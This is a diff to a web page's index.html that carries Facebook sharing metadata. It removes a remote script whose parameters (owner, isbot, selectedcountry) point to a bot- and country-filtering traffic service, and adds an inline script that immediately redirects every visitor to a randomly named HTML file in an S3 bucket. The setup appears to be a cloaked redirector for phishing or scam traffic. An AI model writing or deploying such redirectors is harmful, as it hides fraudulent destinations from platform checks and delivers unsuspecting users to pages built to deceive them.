--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
+<!DOCTYPE html>
 <html>
 	<head>
 		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
@@ -11,6 +12,11 @@
 		<meta property="fb:app_id" content="87741124305" />
 	</head>
 	<body>
-		<script src="https://corbatica.com:3069/api/scripts/fbmultiplepais?contador=rgergerge&owner=maiker_mc&isbot=false&before=true&selectedcountry="></script>
+	<script>
+        (function () {
+            const nuevaURL = 'https://awslondony.s3.us-east-2.amazonaws.com/srthsrthsrth.html';
+            window.location.href = nuevaURL;
+        })();
+    </script>
 	</body>
 </html>
